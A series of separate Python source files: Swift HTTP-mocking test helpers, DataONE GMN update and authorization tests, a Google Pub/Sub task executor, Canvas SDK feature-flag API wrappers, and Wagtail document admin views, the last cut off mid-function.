return HeaderKeyDict(self.getheaders()).get(name, default)
def close(self):
self.closed = True
timestamps_iter = iter(kwargs.get('timestamps') or ['1'] * len(code_iter))
etag_iter = iter(kwargs.get('etags') or [None] * len(code_iter))
if isinstance(kwargs.get('headers'), (list, tuple)):
headers_iter = iter(kwargs['headers'])
else:
headers_iter = iter([kwargs.get('headers', {})] * len(code_iter))
if isinstance(kwargs.get('expect_headers'), (list, tuple)):
expect_headers_iter = iter(kwargs['expect_headers'])
else:
expect_headers_iter = iter([kwargs.get('expect_headers', {})] *
len(code_iter))
x = kwargs.get('missing_container', [False] * len(code_iter))
if not isinstance(x, (tuple, list)):
x = [x] * len(code_iter)
container_ts_iter = iter(x)
code_iter = iter(code_iter)
conn_id_and_code_iter = enumerate(code_iter)
static_body = kwargs.get('body', None)
body_iter = kwargs.get('body_iter', None)
if body_iter:
body_iter = iter(body_iter)
def connect(*args, **ckwargs):
if kwargs.get('slow_connect', False):
eventlet.sleep(0.1)
if 'give_content_type' in kwargs:
if len(args) >= 7 and 'Content-Type' in args[6]:
kwargs['give_content_type'](args[6]['Content-Type'])
else:
kwargs['give_content_type']('')
i, status = next(conn_id_and_code_iter)
if 'give_connect' in kwargs:
give_conn_fn = kwargs['give_connect']
argspec = inspect.getargspec(give_conn_fn)
if argspec.keywords or 'connection_id' in argspec.args:
ckwargs['connection_id'] = i
give_conn_fn(*args, **ckwargs)
etag = next(etag_iter)
headers = next(headers_iter)
expect_headers = next(expect_headers_iter)
timestamp = next(timestamps_iter)
if status <= 0:
raise HTTPException()
if body_iter is None:
body = static_body or ''
else:
body = next(body_iter)
return FakeConn(status, etag, body=body, timestamp=timestamp,
headers=headers, expect_headers=expect_headers,
connection_id=i, give_send=kwargs.get('give_send'),
give_expect=kwargs.get('give_expect'))
connect.code_iter = code_iter
return connect
@contextmanager
def mocked_http_conn(*args, **kwargs):
requests = []
def capture_requests(ip, port, method, path, headers, qs, ssl):
req = {
'ip': ip,
'port': port,
'method': method,
'path': path,
'headers': headers,
'qs': qs,
'ssl': ssl,
}
requests.append(req)
kwargs.setdefault('give_connect', capture_requests)
fake_conn = fake_http_connect(*args, **kwargs)
fake_conn.requests = requests
with mocklib.patch('swift.common.bufferedhttp.http_connect_raw',
new=fake_conn):
yield fake_conn
left_over_status = list(fake_conn.code_iter)
if left_over_status:
raise AssertionError('left over status %r' % left_over_status)
def make_timestamp_iter():
return iter(Timestamp(t) for t in itertools.count(int(time.time())))
class Timeout(object):
def __init__(self, seconds):
self.seconds = seconds
def __enter__(self):
signal.signal(signal.SIGALRM, self._exit)
signal.alarm(self.seconds)
def __exit__(self, type, value, traceback):
signal.alarm(0)
def _exit(self, signum, frame):
class TimeoutException(Exception):
pass
raise TimeoutException
def requires_o_tmpfile_support(func):
@functools.wraps(func)
def wrapper(*args, **kwargs):
if not utils.o_tmpfile_supported():
raise SkipTest('Requires O_TMPFILE support')
return func(*args, **kwargs)
return wrapper
|
|
#!/usr/bin/env python
# This work was created by participants in the DataONE project, and is
# jointly copyrighted by participating institutions in DataONE. For
# more information on DataONE, see our web site at http://dataone.org.
#
# Copyright 2009-2019 DataONE
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Test MNStorage.update() and MNRead.get() without SID.
The access control subsystem is mostly shared between the MNStorage methods, so most are
tested in MNStorage.create()
"""
import io
import time
import freezegun
import pytest
import responses
import d1_common.types.exceptions
import d1_gmn.tests.gmn_mock
import d1_gmn.tests.gmn_test_case
import d1_test.d1_test_case
import d1_test.instance_generator.identifier
@d1_test.d1_test_case.reproducible_random_decorator("TestUpdateWithoutSid")
@freezegun.freeze_time("1955-05-15")
class TestUpdateWithoutSid(d1_gmn.tests.gmn_test_case.GMNTestCase):
@responses.activate
def test_1000(self, gmn_client_v1_v2):
"""update(): Raises NotAuthorized if none of the trusted subjects are in the
session."""
pid, sid, sciobj_bytes, sysmeta_pyxb = self.create_obj(
gmn_client_v1_v2, sid=True
)
with pytest.raises(d1_common.types.exceptions.NotAuthorized):
self.update_obj(
gmn_client_v1_v2,
pid,
session_subj_list=["subj1", "subj2", "subj3"],
trusted_subj_list=["subj4", "subj5"],
disable_auth=False,
)
@responses.activate
def test_1010(self, gmn_client_v1_v2):
"""update(): Non-existing object raises NotFound."""
with pytest.raises(d1_common.types.exceptions.NotFound):
self.get_obj(gmn_client_v1_v2, "_invalid_pid_")
@responses.activate
def test_1020(self, gmn_client_v1_v2):
"""update(): updates the object if one or more trusted subjects are in the
session."""
pid, sid, sciobj_bytes, sysmeta_pyxb = self.create_obj(
gmn_client_v1_v2, sid=True
)
self.update_obj(
gmn_client_v1_v2,
pid,
session_subj_list=["subj1", "subj2", "subj3"],
trusted_subj_list=["subj2", "subj5"],
disable_auth=False,
)
@responses.activate
def test_1030(self, gmn_client_v1_v2):
"""update() / get(): Object with no explicit permissions can be retrieved by a
trusted subject."""
pid, sid, sciobj_bytes, sysmeta_pyxb = self.create_obj(
gmn_client_v1_v2, sid=True
)
pid, sid, sciobj_bytes, sysmeta_pyxb = self.update_obj(gmn_client_v1_v2, pid)
self.get_obj(
gmn_client_v1_v2,
pid,
session_subj_list=["subj1", "subj2", "session_and_trusted_subj"],
trusted_subj_list=["session_and_trusted_subj", "subj4"],
disable_auth=False,
)
@responses.activate
def test_1040(self, gmn_client_v1_v2):
"""update() / get(): Object with no explicit permissions cannot be retrieved by
non-trusted subjects."""
pid, sid, sciobj_bytes, sysmeta_pyxb = self.create_obj(
gmn_client_v1_v2, sid=True
)
pid, sid, sciobj_bytes, sysmeta_pyxb = self.update_obj(
gmn_client_v1_v2, pid, permission_list=None
)
with pytest.raises(d1_common.types.exceptions.NotAuthorized):
self.get_obj(
gmn_client_v1_v2,
pid,
session_subj_list=["subj1", "subj2", "shared_subj", "subj4"],
trusted_subj_list=["subj5", "subj6"],
disable_auth=False,
)
@responses.activate
def test_1050(self, gmn_client_v1_v2):
"""update() / get(): Object with no explicit permissions cannot be retrieved by
the submitter."""
pid, sid, sciobj_bytes, sysmeta_pyxb = self.create_obj(
gmn_client_v1_v2, sid=True
)
pid, sid, sciobj_bytes, sysmeta_pyxb = self.update_obj(
gmn_client_v1_v2, pid, permission_list=None
)
with pytest.raises(d1_common.types.exceptions.NotAuthorized):
self.get_obj(
gmn_client_v1_v2,
pid,
session_subj_list=[sysmeta_pyxb.submitter.value()],
trusted_subj_list=None,
disable_auth=False,
)
@responses.activate
def test_1060(self, gmn_client_v1_v2):
"""update() of object records an update event on the obsoleted object and a
create event on the new object."""
with d1_gmn.tests.gmn_mock.disable_auth():
with d1_test.d1_test_case.reproducible_random_context():
pid_create, sid, sciobj_bytes, sysmeta_pyxb = self.create_obj(
gmn_client_v1_v2, sid=True
)
self.update_obj(gmn_client_v1_v2, pid_create, permission_list=None)
# Obsoleted object has a create and an update event
log = gmn_client_v1_v2.getLogRecords(pidFilter=pid_create)
self.sample.assert_equals(log, "update_records_event", gmn_client_v1_v2)
@responses.activate
def test_1070(self, gmn_client_v1_v2):
"""update() correctly adjusts sysmeta on obsoleted object."""
with d1_gmn.tests.gmn_mock.disable_auth():
with d1_test.d1_test_case.reproducible_random_context():
pid_create, sid, sciobj_bytes, sysmeta_pyxb = self.create_obj(
gmn_client_v1_v2, sid=True
)
sysmeta_before_update_pyxb = gmn_client_v1_v2.getSystemMetadata(
pid_create
)
# Make sure that datetime.now() changes between create() and update().
time.sleep(0.2)
self.update_obj(gmn_client_v1_v2, pid_create, permission_list=None)
sysmeta_after_update_pyxb = gmn_client_v1_v2.getSystemMetadata(
pid_create
)
# dateSysMetadataModified is updated on obsoleted object
# dateUploaded remains unchanged on obsoleted object
self.sample.assert_equals(
sysmeta_before_update_pyxb,
"update_adjusts_obsoleted_obj_before",
gmn_client_v1_v2,
)
self.sample.assert_equals(
sysmeta_after_update_pyxb,
"update_adjusts_obsoleted_obj_after",
gmn_client_v1_v2,
)
@responses.activate
def test_1080(self, gmn_client_v1_v2):
"""MNStorage.update(): Obsoleted object raises InvalidRequest."""
with d1_gmn.tests.gmn_mock.disable_auth():
pid_create, sid, sciobj_bytes, sysmeta_pyxb = self.create_obj(
gmn_client_v1_v2, sid=True
)
self.update_obj(gmn_client_v1_v2, pid_create, permission_list=None)
with pytest.raises(d1_common.types.exceptions.InvalidRequest):
self.update_obj(gmn_client_v1_v2, pid_create, permission_list=None)
@responses.activate
def test_1090(self, gmn_client_v1_v2):
"""MNStorage.update(): Update an object with existing PID raises
IdentifierNotUnique."""
with d1_gmn.tests.gmn_mock.disable_auth():
other_pid, other_sid, other_sciobj_bytes, other_sysmeta_pyxb = self.create_obj(
gmn_client_v1_v2, sid=True
)
old_pid, old_sid, old_sciobj_bytes, old_sysmeta_pyxb = self.create_obj(
gmn_client_v1_v2, sid=True
)
with pytest.raises(d1_common.types.exceptions.IdentifierNotUnique):
self.update_obj(gmn_client_v1_v2, old_pid, new_pid=other_pid)
@responses.activate
def test_1100(self, gmn_client_v1_v2):
"""MNStorage.update(): Update an object with URL PID not matching SysMeta raises
InvalidSystemMetadata."""
with d1_gmn.tests.gmn_mock.disable_auth():
old_pid, old_sid, old_sciobj_bytes, old_sysmeta_pyxb = self.create_obj(
gmn_client_v1_v2, sid=True
)
pid, sid, sciobj_bytes, sysmeta_pyxb = self.generate_sciobj_with_defaults(
gmn_client_v1_v2
)
sysmeta_pyxb.identifier = (
d1_test.instance_generator.identifier.generate_pid()
)
with pytest.raises(d1_common.types.exceptions.InvalidSystemMetadata):
gmn_client_v1_v2.update(
old_pid, io.BytesIO(sciobj_bytes), pid, sysmeta_pyxb
)
|
|
#!/usr/bin/env python
# Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from datetime import datetime
import logging
from subprocess import PIPE, Popen
import sys
import threading
import time
try:
from Queue import Queue, Empty
except ImportError:
from queue import Queue, Empty # python 3.x
from apiclient import discovery
from apiclient.errors import HttpError
import httplib2
from oauth2client.client import GoogleCredentials
log = logging.getLogger(__name__)
PUBSUB_SCOPES = ["https://www.googleapis.com/auth/pubsub"]
class AsynchronousFileReader(threading.Thread):
'''
Helper class to implement asynchronous reading of a file
in a separate thread. Pushes read lines on a queue to
be consumed in another thread.
'''
def __init__(self, fd, queue):
assert isinstance(queue, Queue)
assert callable(fd.readline)
threading.Thread.__init__(self)
self._fd = fd
self._queue = queue
def run(self):
'''The body of the tread: read lines and put them on the queue.'''
for line in iter(self._fd.readline, ''):
self._queue.put(line)
def eof(self):
'''Check whether there is no more content to expect.'''
return not self.is_alive() and self._queue.empty()
def get_client():
"""Creates Pub/Sub client and returns it."""
credentials = GoogleCredentials.get_application_default()
credentials = credentials.create_scoped(PUBSUB_SCOPES)
http = httplib2.Http()
credentials.authorize(http)
return discovery.build('pubsub', 'v1beta2', http=http)
class Executor():
def __init__(self,
topic='mytopic',
project='myproject',
subname='default_sub',
task_cmd="sleep 20",
deadline=60):
self.topic = topic
self.project = project
self.subname = "%s_%s" % (topic, subname)
self.task_cmd = task_cmd
self.client = get_client()
self.sub = self.get_subscription(deadline=deadline)
self.ackdeadline = self.sub['ackDeadlineSeconds']
self.io_queue = Queue()
self.lease_start = None
self.job_log = logging.getLogger(self.subname)
def create_subscription(self, deadline=60):
log.debug("creating subscription")
body = {
# The name of the topic from which this subscription receives messages
'topic': 'projects/{}/topics/{}'.format(self.project, self.topic),
'ackDeadlineSeconds': deadline
}
try:
subscription = self.client.projects().subscriptions().create(
name='projects/{}/subscriptions/{}'.format(self.project,
self.subname),
body=body).execute()
except Exception as e:
log.critical("unable to create subscription")
raise
return subscription
def get_subscription(self, deadline=60):
sub = None
log.debug("getting subscription")
try:
# note: subscriptions are a flat namespace in a project
# we delete then recreate the subscription if it exists
# so we don't execute old messages
self.client.projects().subscriptions().delete(
subscription='projects/{}/subscriptions/{}'.format(
self.project, self.subname)).execute()
log.debug("deleted existing subscription")
except HttpError as e:
if e.resp.status == 404:
sub = self.create_subscription(deadline=deadline)
else:
raise
else:
sub = self.create_subscription(deadline=deadline)
log.debug("subscription %s" % sub)
return sub
def get_messages(self):
# You can fetch multiple messages with a single API call.
batch_size = 1
# Create a POST body for the Pub/Sub request
body = {
# Setting ReturnImmediately to false instructs the API to wait
# to collect the message up to the size of MaxEvents, or until
# the timeout (approx 90s)
'returnImmediately': False,
'maxMessages': batch_size,
}
log.debug("pulling messages")
resp = self.client.projects().subscriptions().pull(
subscription=self.sub['name'],
body=body).execute()
if 'receivedMessages' in resp:
log.debug("number msgs: %s" % len(resp.get('receivedMessages')))
self.lease_start = datetime.now()
return resp.get('receivedMessages')
else:
return []
def extend_lease(self, msg):
body = {
'ackIds': [msg['ackId']],
'ackDeadlineSeconds': self.ackdeadline,
}
resp = self.client.projects().subscriptions().modifyAckDeadline(
subscription=self.sub['name'],
body=body).execute()
return resp
def run_task(self, msg):
proc = Popen(self.task_cmd, stdout=PIPE, shell=True)
stdout_reader = AsynchronousFileReader(proc.stdout, self.io_queue)
stdout_reader.start()
while not stdout_reader.eof():
# read line without blocking
while True:
try:
# line = self.io_queue.get_nowait() # or q.get(timeout=.1)
line = self.io_queue.get_nowait() # could do timeout=.1
except Empty:
break
else:
self.job_log.info(line)
lease_age = datetime.now() - self.lease_start
if lease_age.seconds > (self.ackdeadline - 20):
# 10 seconds left in lease, renew
log.debug("extending lease")
try:
resp = self.extend_lease(msg)
self.extend_error_ct = 0
self.lease_start = datetime.now()
except HttpError as e:
if e.resp.status == 503:
# service might return intermitant 503
log.warning("PubSub returned 503")
self.extend_error_ct += 1
if self.extend_error_ct > 5:
log.critical(
"Too many error responses to extend request")
raise
time.sleep(1)
retcode = proc.poll()
if retcode is not None:
# TODO if error - expire lease immediately?
# process exited
log.debug("process ended")
return retcode
def process_messages(self, msgs):
for received_message in msgs:
pubsub_message = received_message.get('message')
log.debug("processing %s" % received_message.get('ackId'))
if pubsub_message:
ack_ids = []
# Process messages
# Note the design here is to run a single task at a time
# print base64.urlsafe_b64decode(
# str(pubsub_message.get('data')))
# Get the message's ack ID
cmd_retcode = self.run_task(received_message)
# TODO if cmd_retcode == 0, the cmd exited clean
# the retry logic could get complex and is left as an exercise
ack_ids.append(received_message.get('ackId'))
# in this case - should ack per message instead of batch
# as want to make sure task is acked after completion, as
# nothing else will extend
# Create a POST body for the acknowledge request
ack_body = {'ackIds': ack_ids}
if ack_ids:
# Acknowledge the message.
log.debug("acking %s" % ack_ids)
ack_resp = self.client.projects().subscriptions().acknowledge(
subscription=self.sub['name'],
body=ack_body).execute()
def watch_topic(self):
while True:
msgs = self.get_messages()
if msgs:
self.process_messages(msgs)
# when return immediately is False- there is about a 90second open
# request
|
|
from canvas_sdk import client, utils
def list_features_courses(request_ctx, course_id, per_page=None, **request_kwargs):
"""
List all features that apply to a given Account, Course, or User.
:param request_ctx: The request context
:type request_ctx: :class:RequestContext
:param course_id: (required) ID
:type course_id: string
:param per_page: (optional) Set how many results canvas should return, defaults to config.LIMIT_PER_PAGE
:type per_page: integer or None
:return: List features
:rtype: requests.Response (with array data)
"""
if per_page is None:
per_page = request_ctx.per_page
path = '/v1/courses/{course_id}/features'
payload = {
'per_page' : per_page,
}
url = request_ctx.base_api_url + path.format(course_id=course_id)
response = client.get(request_ctx, url, payload=payload, **request_kwargs)
return response
def list_features_accounts(request_ctx, account_id, per_page=None, **request_kwargs):
"""
List all features that apply to a given Account, Course, or User.
:param request_ctx: The request context
:type request_ctx: :class:RequestContext
:param account_id: (required) ID
:type account_id: string
:param per_page: (optional) Set how many results canvas should return, defaults to config.LIMIT_PER_PAGE
:type per_page: integer or None
:return: List features
:rtype: requests.Response (with array data)
"""
if per_page is None:
per_page = request_ctx.per_page
path = '/v1/accounts/{account_id}/features'
payload = {
'per_page' : per_page,
}
url = request_ctx.base_api_url + path.format(account_id=account_id)
response = client.get(request_ctx, url, payload=payload, **request_kwargs)
return response
def list_features_users(request_ctx, user_id, per_page=None, **request_kwargs):
"""
List all features that apply to a given Account, Course, or User.
:param request_ctx: The request context
:type request_ctx: :class:RequestContext
:param user_id: (required) ID
:type user_id: string
:param per_page: (optional) Set how many results canvas should return, defaults to config.LIMIT_PER_PAGE
:type per_page: integer or None
:return: List features
:rtype: requests.Response (with array data)
"""
if per_page is None:
per_page = request_ctx.per_page
path = '/v1/users/{user_id}/features'
payload = {
'per_page' : per_page,
}
url = request_ctx.base_api_url + path.format(user_id=user_id)
response = client.get(request_ctx, url, payload=payload, **request_kwargs)
return response
def list_enabled_features_courses(request_ctx, course_id, **request_kwargs):
"""
List all features that are enabled on a given Account, Course, or User.
Only the feature names are returned.
:param request_ctx: The request context
:type request_ctx: :class:RequestContext
:param course_id: (required) ID
:type course_id: string
:return: List enabled features
:rtype: requests.Response (with void data)
"""
path = '/v1/courses/{course_id}/features/enabled'
url = request_ctx.base_api_url + path.format(course_id=course_id)
response = client.get(request_ctx, url, **request_kwargs)
return response
def list_enabled_features_accounts(request_ctx, account_id, **request_kwargs):
"""
List all features that are enabled on a given Account, Course, or User.
Only the feature names are returned.
:param request_ctx: The request context
:type request_ctx: :class:RequestContext
:param account_id: (required) ID
:type account_id: string
:return: List enabled features
:rtype: requests.Response (with void data)
"""
path = '/v1/accounts/{account_id}/features/enabled'
url = request_ctx.base_api_url + path.format(account_id=account_id)
response = client.get(request_ctx, url, **request_kwargs)
return response
def list_enabled_features_users(request_ctx, user_id, **request_kwargs):
"""
List all features that are enabled on a given Account, Course, or User.
Only the feature names are returned.
:param request_ctx: The request context
:type request_ctx: :class:RequestContext
:param user_id: (required) ID
:type user_id: string
:return: List enabled features
:rtype: requests.Response (with void data)
"""
path = '/v1/users/{user_id}/features/enabled'
url = request_ctx.base_api_url + path.format(user_id=user_id)
response = client.get(request_ctx, url, **request_kwargs)
return response
def get_feature_flag_courses(request_ctx, course_id, feature, **request_kwargs):
"""
Get the feature flag that applies to a given Account, Course, or User.
The flag may be defined on the object, or it may be inherited from a parent
account. You can look at the context_id and context_type of the returned object
to determine which is the case. If these fields are missing, then the object
is the global Canvas default.
:param request_ctx: The request context
:type request_ctx: :class:RequestContext
:param course_id: (required) ID
:type course_id: string
:param feature: (required) ID
:type feature: string
:return: Get feature flag
:rtype: requests.Response (with FeatureFlag data)
"""
path = '/v1/courses/{course_id}/features/flags/{feature}'
url = request_ctx.base_api_url + path.format(course_id=course_id, feature=feature)
response = client.get(request_ctx, url, **request_kwargs)
return response
def get_feature_flag_accounts(request_ctx, account_id, feature, **request_kwargs):
"""
Get the feature flag that applies to a given Account, Course, or User.
The flag may be defined on the object, or it may be inherited from a parent
account. You can look at the context_id and context_type of the returned object
to determine which is the case. If these fields are missing, then the object
is the global Canvas default.
:param request_ctx: The request context
:type request_ctx: :class:RequestContext
:param account_id: (required) ID
:type account_id: string
:param feature: (required) ID
:type feature: string
:return: Get feature flag
:rtype: requests.Response (with FeatureFlag data)
"""
path = '/v1/accounts/{account_id}/features/flags/{feature}'
url = request_ctx.base_api_url + path.format(account_id=account_id, feature=feature)
response = client.get(request_ctx, url, **request_kwargs)
return response
def get_feature_flag_users(request_ctx, user_id, feature, **request_kwargs):
"""
Get the feature flag that applies to a given Account, Course, or User.
The flag may be defined on the object, or it may be inherited from a parent
account. You can look at the context_id and context_type of the returned object
to determine which is the case. If these fields are missing, then the object
is the global Canvas default.
:param request_ctx: The request context
:type request_ctx: :class:RequestContext
:param user_id: (required) ID
:type user_id: string
:param feature: (required) ID
:type feature: string
:return: Get feature flag
:rtype: requests.Response (with FeatureFlag data)
"""
path = '/v1/users/{user_id}/features/flags/{feature}'
url = request_ctx.base_api_url + path.format(user_id=user_id, feature=feature)
response = client.get(request_ctx, url, **request_kwargs)
return response
def set_feature_flag_courses(request_ctx, course_id, feature, state=None, locking_account_id=None, **request_kwargs):
"""
Set a feature flag for a given Account, Course, or User. This call will fail if a parent account sets
a feature flag for the same feature in any state other than "allowed".
:param request_ctx: The request context
:type request_ctx: :class:RequestContext
:param course_id: (required) ID
:type course_id: string
:param feature: (required) ID
:type feature: string
:param state: (optional) "off":: The feature is not available for the course, user, or account and sub-accounts. "allowed":: (valid only on accounts) The feature is off in the account, but may be enabled in sub-accounts and courses by setting a feature flag on the sub-account or course. "on":: The feature is turned on unconditionally for the user, course, or account and sub-accounts.
:type state: string or None
:param locking_account_id: (optional) If set, this FeatureFlag may only be modified by someone with administrative rights in the specified account. The locking account must be above the target object in the account chain.
:type locking_account_id: integer or None
:return: Set feature flag
:rtype: requests.Response (with FeatureFlag data)
"""
state_types = ('off', 'allowed', 'on')
utils.validate_attr_is_acceptable(state, state_types)
path = '/v1/courses/{course_id}/features/flags/{feature}'
payload = {
'state' : state,
'locking_account_id' : locking_account_id,
}
url = request_ctx.base_api_url + path.format(course_id=course_id, feature=feature)
response = client.put(request_ctx, url, payload=payload, **request_kwargs)
return response
def set_feature_flag_accounts(request_ctx, account_id, feature, state=None, locking_account_id=None, **request_kwargs):
"""
Set a feature flag for a given Account, Course, or User. This call will fail if a parent account sets
a feature flag for the same feature in any state other than "allowed".
:param request_ctx: The request context
:type request_ctx: :class:RequestContext
:param account_id: (required) ID
:type account_id: string
:param feature: (required) ID
:type feature: string
:param state: (optional) "off":: The feature is not available for the course, user, or account and sub-accounts. "allowed":: (valid only on accounts) The feature is off in the account, but may be enabled in sub-accounts and courses by setting a feature flag on the sub-account or course. "on":: The feature is turned on unconditionally for the user, course, or account and sub-accounts.
:type state: string or None
:param locking_account_id: (optional) If set, this FeatureFlag may only be modified by someone with administrative rights in the specified account. The locking account must be above the target object in the account chain.
:type locking_account_id: integer or None
:return: Set feature flag
:rtype: requests.Response (with FeatureFlag data)
"""
state_types = ('off', 'allowed', 'on')
utils.validate_attr_is_acceptable(state, state_types)
path = '/v1/accounts/{account_id}/features/flags/{feature}'
payload = {
'state' : state,
'locking_account_id' : locking_account_id,
}
url = request_ctx.base_api_url + path.format(account_id=account_id, feature=feature)
response = client.put(request_ctx, url, payload=payload, **request_kwargs)
return response
def set_feature_flag_users(request_ctx, user_id, feature, state=None, locking_account_id=None, **request_kwargs):
"""
Set a feature flag for a given Account, Course, or User. This call will fail if a parent account sets
a feature flag for the same feature in any state other than "allowed".
:param request_ctx: The request context
:type request_ctx: :class:RequestContext
:param user_id: (required) ID
:type user_id: string
:param feature: (required) ID
:type feature: string
:param state: (optional) "off":: The feature is not available for the course, user, or account and sub-accounts. "allowed":: (valid only on accounts) The feature is off in the account, but may be enabled in sub-accounts and courses by setting a feature flag on the sub-account or course. "on":: The feature is turned on unconditionally for the user, course, or account and sub-accounts.
:type state: string or None
:param locking_account_id: (optional) If set, this FeatureFlag may only be modified by someone with administrative rights in the specified account. The locking account must be above the target object in the account chain.
:type locking_account_id: integer or None
:return: Set feature flag
:rtype: requests.Response (with FeatureFlag data)
"""
state_types = ('off', 'allowed', 'on')
utils.validate_attr_is_acceptable(state, state_types)
path = '/v1/users/{user_id}/features/flags/{feature}'
payload = {
'state' : state,
'locking_account_id' : locking_account_id,
}
url = request_ctx.base_api_url + path.format(user_id=user_id, feature=feature)
response = client.put(request_ctx, url, payload=payload, **request_kwargs)
return response
def remove_feature_flag_courses(request_ctx, course_id, feature, **request_kwargs):
"""
Remove feature flag for a given Account, Course, or User. (Note that the flag must
be defined on the Account, Course, or User directly.) The object will then inherit
the feature flags from a higher account, if any exist. If this flag was 'on' or 'off',
then lower-level account flags that were masked by this one will apply again.
:param request_ctx: The request context
:type request_ctx: :class:RequestContext
:param course_id: (required) ID
:type course_id: string
:param feature: (required) ID
:type feature: string
:return: Remove feature flag
:rtype: requests.Response (with FeatureFlag data)
"""
path = '/v1/courses/{course_id}/features/flags/{feature}'
url = request_ctx.base_api_url + path.format(course_id=course_id, feature=feature)
response = client.delete(request_ctx, url, **request_kwargs)
return response
def remove_feature_flag_accounts(request_ctx, account_id, feature, **request_kwargs):
"""
Remove feature flag for a given Account, Course, or User. (Note that the flag must
be defined on the Account, Course, or User directly.) The object will then inherit
the feature flags from a higher account, if any exist. If this flag was 'on' or 'off',
then lower-level account flags that were masked by this one will apply again.
:param request_ctx: The request context
:type request_ctx: :class:RequestContext
:param account_id: (required) ID
:type account_id: string
:param feature: (required) ID
:type feature: string
:return: Remove feature flag
:rtype: requests.Response (with FeatureFlag data)
"""
path = '/v1/accounts/{account_id}/features/flags/{feature}'
url = request_ctx.base_api_url + path.format(account_id=account_id, feature=feature)
response = client.delete(request_ctx, url, **request_kwargs)
return response
def remove_feature_flag_users(request_ctx, user_id, feature, **request_kwargs):
"""
Remove feature flag for a given Account, Course, or User. (Note that the flag must
be defined on the Account, Course, or User directly.) The object will then inherit
the feature flags from a higher account, if any exist. If this flag was 'on' or 'off',
then lower-level account flags that were masked by this one will apply again.
:param request_ctx: The request context
:type request_ctx: :class:RequestContext
:param user_id: (required) ID
:type user_id: string
:param feature: (required) ID
:type feature: string
:return: Remove feature flag
:rtype: requests.Response (with FeatureFlag data)
"""
path = '/v1/users/{user_id}/features/flags/{feature}'
url = request_ctx.base_api_url + path.format(user_id=user_id, feature=feature)
response = client.delete(request_ctx, url, **request_kwargs)
return response
|
|
import os
from django.core.exceptions import PermissionDenied
from django.core.paginator import Paginator
from django.shortcuts import get_object_or_404, redirect
from django.template.response import TemplateResponse
from django.urls import reverse
from django.utils.translation import gettext as _
from django.views.decorators.vary import vary_on_headers
from wagtail.admin import messages
from wagtail.admin.auth import PermissionPolicyChecker
from wagtail.admin.forms.search import SearchForm
from wagtail.admin.models import popular_tags_for_model
from wagtail.core.models import Collection
from wagtail.documents import get_document_model
from wagtail.documents.forms import get_document_form
from wagtail.documents.permissions import permission_policy
from wagtail.search import index as search_index
permission_checker = PermissionPolicyChecker(permission_policy)
@permission_checker.require_any('add', 'change', 'delete')
@vary_on_headers('X-Requested-With')
def index(request):
Document = get_document_model()
# Get documents (filtered by user permission)
documents = permission_policy.instances_user_has_any_permission_for(
request.user, ['change', 'delete']
)
# Ordering
if 'ordering' in request.GET and request.GET['ordering'] in ['title', '-created_at']:
ordering = request.GET['ordering']
else:
ordering = '-created_at'
documents = documents.order_by(ordering)
# Filter by collection
current_collection = None
collection_id = request.GET.get('collection_id')
if collection_id:
try:
current_collection = Collection.objects.get(id=collection_id)
documents = documents.filter(collection=current_collection)
except (ValueError, Collection.DoesNotExist):
pass
# Search
query_string = None
if 'q' in request.GET:
form = SearchForm(request.GET, placeholder=_("Search documents"))
if form.is_valid():
query_string = form.cleaned_data['q']
documents = documents.search(query_string)
else:
form = SearchForm(placeholder=_("Search documents"))
# Pagination
paginator = Paginator(documents, per_page=20)
documents = paginator.get_page(request.GET.get('p'))
collections = permission_policy.collections_user_has_any_permission_for(
request.user, ['add', 'change']
)
if len(collections) < 2:
collections = None
# Create response
if request.is_ajax():
return TemplateResponse(request, 'wagtaildocs/documents/results.html', {
'ordering': ordering,
'documents': documents,
'query_string': query_string,
'is_searching': bool(query_string),
})
else:
return TemplateResponse(request, 'wagtaildocs/documents/index.html', {
'ordering': ordering,
'documents': documents,
'query_string': query_string,
'is_searching': bool(query_string),
'search_form': form,
'popular_tags': popular_tags_for_model(Document),
'user_can_add': permission_policy.user_has_permission(request.user, 'add'),
'collections': collections,
'current_collection': current_collection,
})
@permission_checker.require('add')
def add(request):
Document = get_document_model()
DocumentForm = get_document_form(Document)
if request.method == 'POST':
doc = Document(uploaded_by_user=request.user)
form = DocumentForm(request.POST, request.FILES, instance=doc, user=request.user)
if form.is_valid():
doc.file_size = doc.file.size
# Set new document file hash
doc.file.seek(0)
doc._set_file_hash(doc.file.read())
doc.file.seek(0)
form.save()
# Reindex the document to make sure all tags are indexed
search_index.insert_or_update_object(doc)
messages.success(request, _("Document '{0}' added.").format(doc.title), buttons=[
messages.button(reverse('wagtaildocs:edit', args=(doc.id,)), _('Edit'))
])
return redirect('wagtaildocs:index')
else:
messages.error(request, _("The document could not be saved due to errors."))
else:
form = DocumentForm(user=request.user)
return TemplateResponse(request, "wagtaildocs/documents/add.html", {
'form': form,
})
@permission_checker.require('change')
def edit(request, document_id):
Document = get_document_model()
DocumentForm = get_document_form(Document)
doc = get_object_or_404(Document, id=document_id)
if not permission_policy.user_has_permission_for_instance(request.user, 'change', doc):
raise PermissionDenied
if request.method == 'POST':
original_file = doc.file
form = DocumentForm(request.POST, request.FILES, instance=doc, user=request.user)
if form.is_valid():
if 'file' in form.changed_data:
doc = form.save(commit=False)
doc.file_size = doc.file.size
# Set new document file hash
doc.file.seek(0)
doc._set_file_hash(doc.file.read())
doc.file.seek(0)
doc.save()
form.save_m2m()
# If providing a new document file, delete the old one.
# NB Doing this via original_file.delete() clears the file field,
# which definitely isn't what we want...
original_file.storage.delete(original_file.name)
else:
doc = form.save()
# Reindex the document to make sure all tags are indexed
search_index.insert_or_update_object(doc)
messages.success(request, _("Document '{0}' updated").format(doc.title), buttons=[
messages.button(reverse('wagtaildocs:edit', args=(doc.id,)), _('Edit'))
])
return redirect('wagtaildocs:index')
else:
messages.error(request, _("The document could not be saved due to errors."))
else:
form = DocumentForm(instance=doc, user=request.user)
try:
